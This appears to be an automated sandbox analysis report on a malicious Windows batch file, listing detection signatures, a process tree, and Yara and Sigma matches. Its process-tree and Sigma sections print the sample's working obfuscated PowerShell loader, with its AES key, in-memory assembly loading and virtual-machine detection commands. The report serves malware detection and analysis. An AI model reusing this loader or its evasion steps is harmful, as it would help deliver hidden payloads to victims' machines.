Edit tour

Windows Analysis Report
NhoqAfkhHL.bat

Overview

General Information

Sample name:	NhoqAfkhHL.bat renamed because original name is a hash value
Original sample name:	c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750.bat
Analysis ID:	1571318
MD5:	98f30844747b3b14f19b6127df1765dc
SHA1:	2441d2660c67e64784c729732553779b952a8296
SHA256:	c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750
Tags:	batcapacity-sg-gl-at-ply-gguser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

.NET source code references suspicious native API functions

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found large BAT file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Installs new ROOT certificates

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Suspicious command line found

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 2452 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3160 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 3716 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 1988 cmdline: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 6548 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

dllhost.exe (PID: 5068 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

dllhost.exe (PID: 4668 cmdline: C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

svchost.exe (PID: 1944 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

spoolsv.exe (PID: 2096 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)

svchost.exe (PID: 2188 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2204 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 2440 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1688 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1700 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1820 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1936 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 1276 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5292 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 6348 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 5908 cmdline: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 5008 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

schtasks.exe (PID: 3868 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 5008	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4257e:$b2: ::FromBase64String( 0x425dc:$b2: ::FromBase64String( 0xb1f62:$b2: ::FromBase64String( 0xb2933:$b2: ::FromBase64String( 0xd0e77:$b2: ::FromBase64String( 0x22ec6:$s1: -join 0x237a2:$s1: -join 0x3c950:$s1: -join 0x7d9a:$s3: Reverse 0x41842:$s3: Reverse 0x1ee76:$s4: += 0x1ee95:$s4: += 0x1eed0:$s4: += 0x1eeed:$s4: += 0x1ef28:$s4: += 0x1ef94:$s4: += 0x1f020:$s4: += 0x1f12e:$s4: += 0x20da8:$s4: += 0x20dcb:$s4: += 0x24a5c:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); , CommandLine: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 3868, ProcessName: schtasks.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5008, TargetFilename: C:\Windows\$nya-onimai2\qVrKPA.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5068, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 6548, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.1% probability

Machine Learning detection for dropped file

Source: C:\Windows\$nya-onimai2\qVrKPA.exe

Joe Sandbox ML: detected

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
